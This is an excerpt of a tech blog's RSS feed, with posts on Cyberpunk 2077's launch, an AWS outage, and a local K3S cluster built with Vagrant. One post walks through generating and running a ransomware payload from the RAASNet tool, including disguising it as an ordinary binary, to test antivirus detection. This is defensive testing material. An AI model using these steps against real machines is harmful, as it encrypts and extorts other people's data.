(unfortunately), where you promise things to a customer, but at no time:</p><ul><li>IT was asked for a realistic estimate of the timeframe</li><li>We asked ourselves if it was technically feasible without costing more than it brings to the company.</li></ul><p>The problem is that the game was sold on too many aspects at the same time, which I think are difficult to do for a company of this size.</p><h3 id="release-the-game-in-%E2%80%9Cearly-access%E2%80%9D-or-%E2%80%9Cclosed-beta%E2%80%9D">Release the game in &#x201C;early access&#x201D; or &#x201C;closed beta&#x201D;</h3><p>Method used more and more often, it would have been possible to release the game in &#x201C;early access&#x201D;, that is to say, by releasing it &#x201C;as is&#x201D;, but by iterating quickly. Players are more understanding of games that have problems in early access than a final version, and this allows for much more feedback.</p><p>Also, a closed beta with a limited number of users would probably allow solving a lot of problems (especially if you take different game configurations).</p><h2 id="not-everything-is-black">Not everything is black</h2><p>To finish this post, I would conclude by saying that everything is not black.</p><p>On PC, the game is completely playable, I have for my part quite a few hours of play on it. Graphically, it is also a success, with a universe of its own, the art direction has done an impressive job.</p><figure class="kg-card kg-gallery-card kg-width-wide"><div class="kg-gallery-container"><div class="kg-gallery-row"><div class="kg-gallery-image"><img src="https://en.tferdinand.net/content/images/2022/01/20201218221047_1.jpg" width="1000" height="563" loading="lazy" alt="Cyberpunk 2077: Analysis of an agile method failure" srcset="https://en.tferdinand.net/content/images/size/w600/2022/01/20201218221047_1.jpg 600w, https://en.tferdinand.net/content/images/2022/01/20201218221047_1.jpg 1000w" sizes="(min-width: 720px) 720px"></div><div class="kg-gallery-image"><img src="https://en.tferdinand.net/content/images/2022/01/20201218085420_1.jpg" width="1000" height="563" loading="lazy" alt="Cyberpunk 2077: Analysis of an agile method failure" srcset="https://en.tferdinand.net/content/images/size/w600/2022/01/20201218085420_1.jpg 600w, https://en.tferdinand.net/content/images/2022/01/20201218085420_1.jpg 1000w" sizes="(min-width: 720px) 720px"></div><div class="kg-gallery-image"><img src="https://en.tferdinand.net/content/images/2022/01/20201222230823_1.jpg" width="1000" height="563" loading="lazy" alt="Cyberpunk 2077: Analysis of an agile method failure" srcset="https://en.tferdinand.net/content/images/size/w600/2022/01/20201222230823_1.jpg 600w, https://en.tferdinand.net/content/images/2022/01/20201222230823_1.jpg 1000w" sizes="(min-width: 720px) 720px"></div></div><div class="kg-gallery-row"><div class="kg-gallery-image"><img src="https://en.tferdinand.net/content/images/2022/01/20201222214955_1.jpg" width="1000" height="563" loading="lazy" alt="Cyberpunk 2077: Analysis of an agile method failure" srcset="https://en.tferdinand.net/content/images/size/w600/2022/01/20201222214955_1.jpg 600w, https://en.tferdinand.net/content/images/2022/01/20201222214955_1.jpg 1000w" sizes="(min-width: 720px) 720px"></div><div class="kg-gallery-image"><img src="https://en.tferdinand.net/content/images/2022/01/20201218215353_1.jpg" width="1000" height="563" loading="lazy" alt="Cyberpunk 2077: Analysis of an agile method failure" srcset="https://en.tferdinand.net/content/images/size/w600/2022/01/20201218215353_1.jpg 600w, https://en.tferdinand.net/content/images/2022/01/20201218215353_1.jpg 1000w" sizes="(min-width: 720px) 720px"></div><div class="kg-gallery-image"><img src="https://en.tferdinand.net/content/images/2022/01/20201222215541_1.jpg" width="1000" height="563" loading="lazy" alt="Cyberpunk 2077: Analysis of an agile method failure" srcset="https://en.tferdinand.net/content/images/size/w600/2022/01/20201222215541_1.jpg 600w, https://en.tferdinand.net/content/images/2022/01/20201222215541_1.jpg 1000w" sizes="(min-width: 720px) 720px"></div></div><div class="kg-gallery-row"><div class="kg-gallery-image"><img src="https://en.tferdinand.net/content/images/2022/01/20201222230650_1.jpg" width="1000" height="563" loading="lazy" alt="Cyberpunk 2077: Analysis of an agile method failure" srcset="https://en.tferdinand.net/content/images/size/w600/2022/01/20201222230650_1.jpg 600w, https://en.tferdinand.net/content/images/2022/01/20201222230650_1.jpg 1000w" sizes="(min-width: 720px) 720px"></div><div class="kg-gallery-image"><img src="https://en.tferdinand.net/content/images/2022/01/20201218202529_1.jpg" width="1000" height="563" loading="lazy" alt="Cyberpunk 2077: Analysis of an agile method failure" srcset="https://en.tferdinand.net/content/images/size/w600/2022/01/20201218202529_1.jpg 600w, https://en.tferdinand.net/content/images/2022/01/20201218202529_1.jpg 1000w" sizes="(min-width: 720px) 720px"></div><div class="kg-gallery-image"><img src="https://en.tferdinand.net/content/images/2022/01/20201216081742_1.jpg" width="1000" height="563" loading="lazy" alt="Cyberpunk 2077: Analysis of an agile method failure" srcset="https://en.tferdinand.net/content/images/size/w600/2022/01/20201216081742_1.jpg 600w, https://en.tferdinand.net/content/images/2022/01/20201216081742_1.jpg 1000w" sizes="(min-width: 720px) 720px"></div></div></div></figure><p>Also, in terms of writing, we feel that some characters are quite worked and have depth. I also salute the efforts of the studio to put many women as central characters in their game!</p><p>The Witcher was also riddled with bugs at its release, but is now considered one of the best games of the decade, no doubt that the shot will be corrected on this game, especially since the studio has already delivered its first salvos of fixes.</p><p>However, I would also note that releasing &#x201C;poorly finished&#x201D; games under the pretext that they can be patched later is becoming a norm in the video game industry, making the customer suffer for having an unstable product. Nowadays, many studios are in the same situation (hi Assassin&#x2019;s Creed and its blocking bugs that were fixed one month after its release).</p>]]></content:encoded></item><item><title><![CDATA[Test your antivirus with a cryptolocker (mastered)]]></title><description><![CDATA[<p>Computer attack patterns have evolved in recent years. Cryptolockers have become the spearhead of many hackers.</p><p>Does your antivirus vendor promise you that you are protected against these new threats? OK, prove it before you get stuck by a real attack.</p><h2 id="let%E2%80%99s-talk-about-cryptolocker">Let&#x2019;s talk about cryptolocker</h2><p>The principle of</p>]]></description><link>https://en.tferdinand.net/test-your-antivirus-with-a-cryptolocker-mastered/</link><guid isPermaLink="false">6337ff9a65fbc6000155a56a</guid><category><![CDATA[Security]]></category><category><![CDATA[Test]]></category><dc:creator><![CDATA[Teddy FERDINAND]]></dc:creator><pubDate>Fri, 04 Dec 2020 06:00:00 GMT</pubDate><media:content url="https://en.tferdinand.net/content/images/2022/01/Webp.net-compress-image-1.jpg" medium="image"/><content:encoded><![CDATA[<img src="https://en.tferdinand.net/content/images/2022/01/Webp.net-compress-image-1.jpg" alt="Test your antivirus with a cryptolocker (mastered)"><p>Computer attack patterns have evolved in recent years. Cryptolockers have become the spearhead of many hackers.</p><p>Does your antivirus vendor promise you that you are protected against these new threats? OK, prove it before you get stuck by a real attack.</p><h2 id="let%E2%80%99s-talk-about-cryptolocker">Let&#x2019;s talk about cryptolocker</h2><p>The principle of a cryptolocker is quite simple: encrypt target files (often.doc, .txt, . odt, etc.) and then demand a ransom. A ransomware has nothing to gain by destroying the underlying OS, so system files are rarely touched.</p><p>So it will encrypt as many files as possible and then ask for payment (often in Bitcoin or other cryptocurrencies) to obtain the decryption key.</p><p>These threats are very serious, large groups have had to face them recently and were sometimes paralyzed for several days.</p><h3 id="detecting-a-cryptolocker">Detecting a cryptolocker</h3><p>The concern is that we are nowadays in a world with more and more sophisticated and discreet malware. Nowadays, the power of heuristic engines on antivirus software is widely exploited. These engines detect abnormal or dangerous behavior rather than just a previously identified binary (signature).</p><p>The purpose of the test I&#x2019;m offering today is to test the performance of this engine, whether it&#x2019;s on its detection speed, reaction (blocking the attack) and its remediation.</p><p>Ransomware as a service<br>To perform these tests, we will use a small open-source tool:</p><figure class="kg-card kg-bookmark-card"><a class="kg-bookmark-container" href="https://github.com/leonv024/RAASNet?ref=en.tferdinand.net"><div class="kg-bookmark-content"><div class="kg-bookmark-title">GitHub - leonv024/RAASNet: Open-Source Ransomware As A Service for Linux, MacOS and Windows</div><div class="kg-bookmark-description">Open-Source Ransomware As A Service for Linux, MacOS and Windows - GitHub - leonv024/RAASNet: Open-Source Ransomware As A Service for Linux, MacOS and Windows</div><div class="kg-bookmark-metadata"><img class="kg-bookmark-icon" src="https://github.com/fluidicon.png" alt="Test your antivirus with a cryptolocker (mastered)"><span class="kg-bookmark-author">GitHub</span><span class="kg-bookmark-publisher">leonv024</span></div></div><div class="kg-bookmark-thumbnail"><img src="https://repository-images.githubusercontent.com/199071705/cfc26700-b49d-11e9-9fe2-3ce87c03fee8" alt="Test your antivirus with a cryptolocker (mastered)"></div></a></figure><p>This small python script simulates the basic operation of a cryptolocker.</p><p>It will allow you to start a local server, which will be used to collect information about the encryption (IP address, encryption keys, etc.).</p><p>It also allows you to create the script that will be used for the encryption, and to compile it to make it portable.</p><h3 id="why-is-this-project-interesting">Why is this project interesting?</h3><p>First of all, the interest is already that it is completely harmless:</p><ul><li>It does not spread on your network</li><li>You can decrypt the data</li><li>It is open source, you can see or modify the code</li><li>it works on all OS, because it only requires Python 3</li></ul><p>Then, the attack model is all the more interesting as it is realistic, the use of a python script in a &#x201C;standalone&#x201D; mode allows simulating a concrete case: a third party library available on pip for example, which would be malicious.</p><p>This also allows you to check that your antivirus software reacts to attacks that are not binaries.</p><h2 id="download-and-set-up-the-prerequisites">Download and set up the prerequisites</h2><h3 id="clone-the-repository">Clone the repository</h3><p>If you have the Git client installed, you can directly clone the repository via the Git client:</p><pre><code>git clone git@github.com:leonv024/RAASNet.git
</code></pre><p>If you don&#x2019;t have the Git client, you can also directly download the zip file from the repository.</p><figure class="kg-card kg-image-card"><img src="https://en.tferdinand.net/content/images/2022/01/image.png" class="kg-image" alt="Test your antivirus with a cryptolocker (mastered)" loading="lazy" width="917" height="440" srcset="https://en.tferdinand.net/content/images/size/w600/2022/01/image.png 600w, https://en.tferdinand.net/content/images/2022/01/image.png 917w" sizes="(min-width: 720px) 720px"></figure><h3 id="installing-the-prerequisites">Installing the prerequisites</h3><p>On the PC on which you want to test the script, it is necessary to have Python 3 installed, as well as the pip3 client.</p><p>For these installations, I invite you to go to the associated documentation pages to see how to install them according to your OS context:</p><ul><li>Python 3: <a href="https://docs.python.org/fr/3/using/index.html?ref=en.tferdinand.net">https://docs.python.org/fr/3/using/index.html</a></li><li>PIP 3: <a href="https://pip.pypa.io/en/stable/installing/?ref=en.tferdinand.net">https://pip.pypa.io/en/stable/installing/</a></li></ul><p>Once these steps are made, it is necessary to install the prerequisites:</p><!--kg-card-begin: markdown--><pre><code>pip install -r ./requirements.txt</code></pre>
<!--kg-card-end: markdown--><p>Under Windows, it is necessary to install an additional package for the management of windows:</p><pre><code>pip install image</code></pre><h3 id="start-the-application">Start the application</h3><p>Once the prerequisites are installed, you can start the application:</p><pre><code>python3 ./RAASNet.py</code></pre><p>Once this is done, you will have to create an account, it is not necessary to have a valid email address for this account.</p><p>Then you can start the server, this will allow you to collect information when encryption starts.</p><p><strong>Warning: If you do not start the server, you will not have the decryption key!</strong></p><h2 id="initiate-the-attack-payload">Initiate the attack payload</h2><p>Now that we have prepared the base of our attack. The next step is to create the attack script.</p><p>To do this, we will click on &#x201C;Generate Payload&#x201D;. Then you can select the options for your attack:</p><ul><li>The list of target files</li><li>The base directory for the attack</li><li>The encryption method to use</li><li>Whether or not to display a window at the end to indicate that the content is encrypted</li></ul><figure class="kg-card kg-image-card"><img src="https://en.tferdinand.net/content/images/2022/01/image-1.png" class="kg-image" alt="Test your antivirus with a cryptolocker (mastered)" loading="lazy" width="1366" height="768" srcset="https://en.tferdinand.net/content/images/size/w600/2022/01/image-1.png 600w, https://en.tferdinand.net/content/images/size/w1000/2022/01/image-1.png 1000w, https://en.tferdinand.net/content/images/2022/01/image-1.png 1366w" sizes="(min-width: 720px) 720px"></figure><p>Once the configuration is done, just click on &#x201C;Generate&#x201D; to create two scripts:</p><ul><li>payload.py: this script is your attack load itself</li><li>decrypt.py: this script allows decrypting the files after the attack</li></ul><h2 id="it%E2%80%99s-popcorn-time">It&#x2019;s popcorn time!</h2><p>Now that you have everything ready, it&#x2019;s the most fun part: launching the attack!</p><p>Here are three points to watch on your antivirus:</p><ul><li>whether or not the attack is detected</li><li>the speed of detection</li><li>the possibility to remedy or not: does the antivirus know how to restore the encrypted files?</li></ul><p>To launch the attack, a simple command:</p><pre><code>python3 payload.py</code></pre><p>Depending on the encryption method, you have chosen and the volume of data, the encryption will take from a few seconds to several minutes.</p><p>The interest here is to see if your antivirus software reacts or not to the encryption, via its heuristic engine.</p><p>For the test to be as consistent as possible, don&#x2019;t hesitate to vary the attack mode, for example by launching the encryption from a USB key and remotely setting up the server.</p><p>Moreover, to be sure to trigger your antivirus, don&#x2019;t hesitate to put a little bit of file volume (a few thousand) to make sure that the volume is sufficient to make it react.</p><h3 id="and-in-binary">And in binary?</h3><p>RAASNet also allows you to convert python scripts into classic binaries. Including replacing the basic icon.</p><p>By doing so, you can reproduce classic attack patterns, e.g., a PDF invoice by email, an autorun executable on a USB stick, a download from a third-party site, etc.</p><p>Once again, the idea is to reproduce classic attacks and observe the reaction (or not) of your antivirus.</p><h2 id="to-conclude">To conclude</h2><p>Whether your antivirus has detected the attack or not, you must remain pragmatic.</p><p>Depending on the vector used, it may be normal that your antivirus considered the action as legitimate, that&#x2019;s why you should not hesitate to transfer the viral load on a simple USB key, for example.</p><p>Moreover, this malware is voluntarily unknown and harmless, so the risk is controlled.</p><p>However, this is a simple and interesting test to do to check the reaction of your antivirus.</p><p>For my part, my personal antivirus detected the abnormal behavior after a few encrypted files and restored the content.</p>]]></content:encoded></item><item><title><![CDATA[Turn off the Internet: AWS is no longer responding!]]></title><description><![CDATA[<p>A few days ago, an incident impacting the AWS cloud provider had a significant impact on many companies and services directly affected by this instability.</p><p>I saw on social networks many reactions, often beside the subject (unfortunately) and I thought it could be useful to give you my analysis of</p>]]></description><link>https://en.tferdinand.net/turn-off-the-internet-aws-is-no-longer-responding/</link><guid isPermaLink="false">6337ff9a65fbc6000155a568</guid><category><![CDATA[Point of view]]></category><category><![CDATA[AWS]]></category><category><![CDATA[Amazon]]></category><category><![CDATA[chaos]]></category><category><![CDATA[fullcover]]></category><dc:creator><![CDATA[Teddy FERDINAND]]></dc:creator><pubDate>Mon, 30 Nov 2020 17:53:04 GMT</pubDate><media:content url="https://en.tferdinand.net/content/images/2020/11/nastya_dulhiier_okoo_lRk9e--1-.jpg" medium="image"/><content:encoded><![CDATA[<img src="https://en.tferdinand.net/content/images/2020/11/nastya_dulhiier_okoo_lRk9e--1-.jpg" alt="Turn off the Internet: AWS is no longer responding!"><p>A few days ago, an incident impacting the AWS cloud provider had a significant impact on many companies and services directly affected by this instability.</p><p>I saw on social networks many reactions, often beside the subject (unfortunately) and I thought it could be useful to give you my analysis of the subject.</p><h2 id="rewind">Rewind</h2><p>Let&#x2019;s start by recalling the incident a bit.</p><p>On Wednesday evening (French time), AWS encountered a growing number of errors in some of its services in the us-east-1 (North Virginia) region.</p><p>Although it is considered that an incident in a single area is not supposed to have a huge impact on AWS, it should be considered that this area is the &#x201C;core&#x201D; area of AWS. Most global services (IAM, CloudFront, Route53, etc.) depend heavily on it.</p><p>It should also be taken into account that it is considered today that about 30% of the Internet depends directly on AWS, which is just colossal.</p><p>This is not the first AWS incident, and it won&#x2019;t be the last. It&#x2019;s been in the news because of the length of time it&#x2019;s been going on and the visibility it&#x2019;s been given. A lot of companies have indeed cleared themselves of any worries by sending the ball back to Amazon, but things are a little more complicated than that.</p><h2 id="-everything-fails-all-the-time-">&#x201C;Everything fails all the time.&#x201D;</h2><p>This sentence does not come from me, but from the CTO of Amazon Web Services, Werner Vogels.</p><p>It is based on an elementary rule: wherever you host your service, you have to take into account that it will sometimes fall down, like any infrastructure.</p><p>Having been in production for more than 10 years, I&#x2019;m familiar with the subject: you can redund a service, you just reduce the risk of an incident. There is no such thing as zero risk.</p><p>During my AWS training sessions, this is a point that often comes up, the question to ask yourself about the design of your infrastructure is not &#x201C;how to prevent my infrastructure from falling down&#x201D;, but rather &#x201C;what to do when my infrastructure falls down&#x201D;.</p><p>Those of you who, like me, work on AWS on a daily basis know that there are incidents every day, less impacting, but there are still incidents.</p><h2 id="the-risks-of-hyperconvergence">The risks of hyperconvergence</h2><p>The public clouds and especially the GAFAMs have allowed a hyper-convergence of many services.</p><p>Indeed, because of the bricks proposed, it is very easy to say to oneself that one is going to place all one&#x2019;s logs at AWS/Azure/GCP.</p><p>A company can indeed find something to meet almost all its needs of the shelf, very often with directly managed services and the support that goes with it.</p><p>This aspect has been an important vector of acceleration in recent years, allowing us to deploy and therefore innovate ever faster.</p><p>The concern is that this has also made AWS an Internet colossus. Many companies have become completely dependent on this provider.</p><p>But to just say that the concern is there is to see only the tip of the iceberg.</p><h2 id="design-and-risk-assessment">Design and risk assessment</h2><p>In an IT department, the role of an architect is to design a resilient infrastructure that meets technical and functional needs.</p><p>When we talk about resilience, we often think of always having an application running 24/7 with an availability rate of 99.99%.</p><p>In reality it&#x2019;s more complicated than that.</p><h2 id="risk-assessment-vs-cost">Risk assessment VS. cost</h2><p>Normally, when designing an architecture, one asks oneself the question of the targeted availability rate as well as the cost of unavailability.</p><p>In addition, we need to see if there are mechanisms to mitigate unavailability.</p><p>For example, let&#x2019;s imagine a home automation device: it sends its metrics to AWS every 10 minutes.</p><p>What happens if my service that has to receive these metrics is unavailable?</p><p>2 choices here:</p><ul><li>I lose my metrics: the availability of my service is therefore essential</li><li>I have a buffer locally on the device, allowing delaying in case of unavailability: in this case, I can afford unavailability, because I potentially lose only the &#x201C;real time&#x201D; part</li></ul><p>These two choices are already determined by the amount of money you want to put into a project.</p><p>Having local storage costs additional hardware, additional assembly complexity, and additional development and maintenance costs.</p><p>Also, it means that my server is able to manage in &#x201C;catch-up&#x201D; mode.</p><p>The other aspect is to ask what the cost of downtime is:</p><ul><li>In terms of service provided</li><li>In terms of potential contractual penalties</li><li>In terms of image</li></ul><p>We then put this unavailability against the probability of the latter. Very often, simplistically, the potential availability of infrastructure is that of the element with the lowest availability.</p><p>Then, we can ask ourselves how much it will cost to cover this unavailability.</p><p>Then we make a simple comparison, and quite obviously, the most cost-effective solution is the one that is taken into account.</p><p>This is why unavailability is not always a problem. It is the role of the architects to evaluate it upstream.</p><h2 id="the-chaos-theory">The chaos theory</h2><p>To have confidence in your infrastructure, you have to test it. This is the basic idea of chaos engineering.</p><p>Starting from the observation that your infrastructure is going to fall is a point, to make it fall voluntarily, in a framework that you can control:</p><p>Increase confidence in your high availability<br>to test your automated procedures and/or remediation.<br>Tools exist for this purpose, if you want to know more, I invite you to read the excellent posts of my colleague Akram on this subject on the WeScale blog [French links]:</p><figure class="kg-card kg-bookmark-card"><a class="kg-bookmark-container" href="https://blog.wescale.fr/2019/09/26/le-guide-de-chaos-engineering-part-1/?ref=en.tferdinand.net"><div class="kg-bookmark-content"><div class="kg-bookmark-title">Le guide de Chaos Engineering : Partie 1</div><div class="kg-bookmark-description">Le Chaos Engineering (CE) est une discipline d&#x2019;exp&#xE9;rimentation dans les syst&#xE8;mescomplexes et distribu&#xE9;s, qui vise &#xE0; se rassurer sur leur comportement face &#xE0; desincidents et perturbations. Dans cet article je vais m&#x2019;attacher &#xE0; simplementapporter les bases du chaos et quelques d&#xE9;finitions pour pose&#x2026;</div><div class="kg-bookmark-metadata"><img class="kg-bookmark-icon" src="https://blog.wescale.fr/favicon.png" alt="Turn off the Internet: AWS is no longer responding!"><span class="kg-bookmark-author">Le blog des experts WeScale - DevOps, Cloud et passion</span><span class="kg-bookmark-publisher">Akram RIAHI</span></div></div><div class="kg-bookmark-thumbnail"><img src="https://blog.wescale.fr/content/images/2019/09/Chaos-cover.png" alt="Turn off the Internet: AWS is no longer responding!"></div></a></figure><figure class="kg-card kg-bookmark-card"><a class="kg-bookmark-container" href="https://blog.wescale.fr/2020/03/19/le-guide-de-chaos-engineering-partie-2/?ref=en.tferdinand.net"><div class="kg-bookmark-content"><div class="kg-bookmark-title">Le guide de Chaos Engineering : Partie 2</div><div class="kg-bookmark-description">Introduction Nous avons vu dans la premi&#xE8;re partie du guide du Chaos Engineering (CE)[/2019/09/26/le-guide-de-chaos-engineering-part-1/] que le CE ne peut pas avoirlieu sans exp&#xE9;rimentations. Nous allons continuer notre voyage fantastique dans ce monde en passant par lepays du &#x201C;Chaos Tools Cou&#x2026;</div><div class="kg-bookmark-metadata"><img class="kg-bookmark-icon" src="https://blog.wescale.fr/favicon.png" alt="Turn off the Internet: AWS is no longer responding!"><span class="kg-bookmark-author">Le blog des experts WeScale - DevOps, Cloud et passion</span><span class="kg-bookmark-publisher">Akram RIAHI</span></div></div><div class="kg-bookmark-thumbnail"><img src="https://blog.wescale.fr/content/images/2020/03/Capture-d--cran-2020-03-19---10.15.14-1.png" alt="Turn off the Internet: AWS is no longer responding!"></div></a></figure><p>Some companies go so far as to use these tools in production. For example, Netflix uses its simian army in production to ensure the resilience of its infrastructure.</p><p>Destroying while mastering also allows you to better know how to react when your infrastructure falls, as it is a habit.</p><h2 id="to-conclude">To conclude</h2><p>The companies that put the blame on AWS are the only ones at fault.</p><p>Either they underestimated the impact of unavailability, or the unavailability costs less than expected.</p><p>Either way, it is a design choice to depend on a single supplier and a single availability area. Blaming one supplier is cowardly and does not represent the reality of things.</p><p>It is possible to prepare and simulate these unavailabilities in advance of the phase in order to react in the best possible way; repetition creates trust.</p><p>The other concern also comes from the fact that many companies have bet everything on AWS, the incidents of the last few days may be going to reshuffle the cards a bit, but is it worse?</p><p>Advocating for a sovereign cloud provider is not the answer either if you put all your marbles in one place. Once again, good infrastructure design is essential, better safe than sorry. You can learn more about this subject with Damy. R&#x2019;s post [French link]:</p><figure class="kg-card kg-bookmark-card"><a class="kg-bookmark-container" href="https://www.damyr.fr/posts/aws-tombe-internet-tremble/?ref=en.tferdinand.net"><div class="kg-bookmark-content"><div class="kg-bookmark-title">AWS tombe, l&#x2019;internet tremble &#xB7; Damy.R</div><div class="kg-bookmark-description"></div><div class="kg-bookmark-metadata"><span class="kg-bookmark-author">Damy.R R&#xE9;parateur de nuage passionn&#xE9; par l&apos;opensource et la mouvance DevOps.</span></div></div><div class="kg-bookmark-thumbnail"><img src="https://www.damyr.fr/Damy.R.png" alt="Turn off the Internet: AWS is no longer responding!"></div></a></figure>]]></content:encoded></item><item><title><![CDATA[Create a local Kubernetes cluster with Vagrant]]></title><description><![CDATA[<p>Testing Kubernetes is quite easy thanks to solutions such as Minikube.</p><p>However, when you want to test cluster-specific features, such as load balancing or failover, it is not necessarily suitable anymore.</p><p>It is possible to build your Kubernetes infrastructure on servers, or by using managed services from a cloud provider</p>]]></description><link>https://en.tferdinand.net/create-a-local-kubernetes-cluster-with-vagrant/</link><guid isPermaLink="false">6337ff9a65fbc6000155a565</guid><category><![CDATA[Kubernetes]]></category><category><![CDATA[Docker]]></category><category><![CDATA[DevOps]]></category><category><![CDATA[Infra as code]]></category><category><![CDATA[Linux]]></category><category><![CDATA[Traefik]]></category><category><![CDATA[K3S]]></category><category><![CDATA[Vagrant]]></category><category><![CDATA[fullcover]]></category><dc:creator><![CDATA[Teddy FERDINAND]]></dc:creator><pubDate>Tue, 15 Sep 2020 07:00:57 GMT</pubDate><media:content url="https://en.tferdinand.net/content/images/2020/09/banner_k3s_cluster.jpg" medium="image"/><content:encoded><![CDATA[<img src="https://en.tferdinand.net/content/images/2020/09/banner_k3s_cluster.jpg" alt="Create a local Kubernetes cluster with Vagrant"><p>Testing Kubernetes is quite easy thanks to solutions such as Minikube.</p><p>However, when you want to test cluster-specific features, such as load balancing or failover, it is not necessarily suitable anymore.</p><p>It is possible to build your Kubernetes infrastructure on servers, or by using managed services from a cloud provider (Kapsule at Scaleway, AKS at Azure, GKE at GCP or EKS at AWS for example).</p><p>Nevertheless, these solutions cost money. When you just want to test functionalities or self-training, it&apos;s not necessarily appropriate.</p><p>In this post, I propose you see how you can set up a Kubernetes cluster locally on your computer with a similar behavior as a classical cluster.</p><p>To do this, we will use several tools that I will describe below:</p><ul><li>Vagrant</li><li>VirtualBox (or VMWare)</li><li>K3S</li><li>Traefik</li></ul><h2 id="vagrant-provisioning-of-virtual-machines">Vagrant: Provisioning of virtual machines</h2><p>Vagrant is a tool from HashiCorp (editor of Terraform I already mentioned).</p><p>This program allows to quickly deploy virtual machines by exploiting description files.</p><p>Thus by writing a VagrantFile, it is possible to deploy in a few minutes one or more machines, by provisioning them with scripts or tools such as Ansible.</p><p>The advantage of Vagrant is that it allows configuration sharing to allow a complete team to work under the same conditions locally, reproducing a low-cost production behavior.</p><p>A simple text file is enough to share. Moreover, it is in fact possible to version this file on a version management tool.</p><h2 id="k3s-the-lighter-kubernetes">K3S: The lighter kubernetes</h2><p>K3S is a tool created by Rancher (who also created an orchestrator of the same name for Docker).</p><p>It is a lightweight Kubernetes that can work on smaller configurations. It can work too without any problem on a raspberry pi.</p><p>In our case, it will allow us to override the limitations of K8S which requires at least 2G of ram to run.</p><p>Since we are going to create several servers, the idea is to limit the memory needed to the maximum.</p><p>In this post we will exploit the multimaster mode, which is very recent. If you want more information on this subject, I invite you to read the excellent article by <a href="https://blog.wescale.fr/2020/01/09/k3s-le-kubernetes-allege-hautement-disponible/?ref=en.tferdinand.net">my colleagues at WeScale [French Link]</a>.</p><h2 id="traefik-again-and-again-the-load-balancer">Traefik : Again and again the load balancer</h2><p>In order to reproduce as closely as possible the behavior of a classic cluster, we will also deploy a Traefik server as a front end, in front of Kubernetes, which will balance the load between the 3 master nodes.</p><p>The choice of Traefik is arbitrary, any reverse proxy will do.</p><p>Once again, the goal is to have something light, hence the use of Traefik which is very resource efficient.</p><h2 id="target-deployment-overview">Target deployment overview</h2><p>We are going to have 3 distinct layers in our deployment :</p><p>front_lb : A machine using Traefik to manage the incoming traffic to Kubernetes<br>kubemaster# : The 3 kubernetes &quot;master&quot; servers<br>kubenode#: The 3 kubernetes servers serving as execution nodes for the pods</p><p></p><figure class="kg-card kg-image-card kg-width-full"><img src="https://tferdinand.net/content/images/2020/09/image-8.png" class="kg-image" alt="Create a local Kubernetes cluster with Vagrant" loading="lazy" width="771" height="561"></figure><h2 id="prerequisites-and-information">Prerequisites and information</h2><p>The deployment I will describe below has been tested and validated with the following configuration:</p><!--kg-card-begin: html--><table>
<tr>
    <td>
        Operating System
    </td>
    <td>
        Parrot OS 4.10
    </td>
</tr>
<tr>
    <td>
        Total memory
    </td>
    <td>
        16 Go
    </td>
</tr>
<tr>
    <td>
        CPU
    </td>
    <td>
        Intel i7 10510u
    </td>
</tr>
<tr>
    <td>
        Virtualization
    </td>
    <td>
        VirtualBox 6.1.12
    </td>
</tr>
<tr>
    <td>
        Vagrant version
    </td>
    <td>
        2.2.9
    </td>
</tr>
</table>    <!--kg-card-end: html--><p>The deployment does not normally use any of this information on a hard disk, but some settings may need to be adjusted depending on your host system.</p><p>Also, in order to allow my nodes to communicate with each other in SSH, I created a RSA key that I deploy automatically.</p><p>This key is in the ./.ssh directory, and it is necessary that you create it yourself before starting the deployment via Vagrant.</p><p>You can do it easily with the following command:</p><!--kg-card-begin: html--><pre class="language-bash"><code>ssh-keygen -f ./.ssh/id_rsa
</code></pre><!--kg-card-end: html--><p>At the passphrase request, it is necessary not to put any, because we will use this key to have a scripted connection between our nodes.</p><h2 id="it-s-time-to-get-our-hands-dirty-">It&apos;s time to get our hands dirty!</h2><p>All right, enough talk, when do we deploy?</p><p>Not right away, first of all, let&apos;s look at what we&apos;re going to deploy.</p><h3 id="the-basic-os">The basic OS</h3><p>In our machines, we will first have to deploy an operating system.</p><p>Vagrant uses a system of &quot;boxes&quot; which are actually images prepared for Vagrant. It is possible to get the list of boxes on <a href="https://app.vagrantup.com/boxes/search?ref=en.tferdinand.net">the official website</a>.</p><p>In our case, we will use a Ubuntu 18.04 box.</p><p>I&apos;m not a fan of Ubuntu as a server, I prefer a good old Debian or Centos, but Ubuntu is the system <a href="https://rancher.com/docs/k3s/latest/en/installation/installation-requirements/?ref=en.tferdinand.net">officially supported by K3S</a>.</p><p>For Traefik, I&apos;ll use the same box, just because I&apos;m lazy. In itself, nothing prevents me from using another base box.</p><h3 id="masters">Masters</h3><p>So we have at first the Kubernetes &quot;masters&quot; servers.</p><p>For the latter, we have two distinct cases.</p><p>The first server must use a parameter to indicate that we want to initiate a K3S cluster, with the &quot;--cluster-init&quot; parameter.</p><p>Then, the other nodes will have to connect to the first node with the secret generated by it.</p><p>To simplify the exchange of the secret, the second and third nodes will then download the file containing the secret via SCP (hence the creation of the SSH key).</p><p>In addition, we will tell K3S the IP address of the servers, because the VM has several network cards, so K3S would mount the wrong IP each time.</p><p>So here is the associated Vagrant configuration block :</p><!--kg-card-begin: html--><pre class="language-hcl line-numbers"><code>MASTER_COUNT = 3
IMAGE = &quot;ubuntu/bionic64&quot;

...

Vagrant.configure(&quot;2&quot;) do |config|

  (1..MASTER_COUNT).each do |i|
    config.vm.define &quot;kubemaster#{i}&quot; do |kubemasters|
      kubemasters.vm.box = IMAGE
      kubemasters.vm.hostname = &quot;kubemaster#{i}&quot;
      kubemasters.vm.network  :private_network, ip: &quot;10.0.0.#{i+10}&quot;
      kubemasters.vm.provision &quot;file&quot;, source: &quot;./.ssh/id_rsa.pub&quot;, destination: &quot;/tmp/id_rsa.pub&quot;
      kubemasters.vm.provision &quot;file&quot;, source: &quot;./.ssh/id_rsa&quot;, destination: &quot;/tmp/id_rsa&quot;
      kubemasters.vm.provision &quot;shell&quot;, privileged: true,  path: &quot;scripts/master_install.sh&quot;
    end
  end

...

end
</code></pre><!--kg-card-end: html--><ul><li>Line 8: Vagrant loop structure</li><li>Line 11: We name each machine with a different host name.</li><li>Line 12: Each machine will have a fixed IP allocated (from 10.0.0.11 to 10.0.0.13)</li><li>Line 13/14: We push our SSH key which will be deployed by the script indicated in line 15</li></ul><p>As you can see, the description of the Vagrant side is quite basic.</p><p>Now, let&apos;s see the second side of this deployment: the provisioning shell script.</p><!--kg-card-begin: html--><pre class="language-bash line-numbers"><code>#!/bin/sh

# Deploy keys to allow all nodes to connect each others as root
mv /tmp/id_rsa*  /root/.ssh/

chmod 400 /root/.ssh/id_rsa*
chown root:root  /root/.ssh/id_rsa*

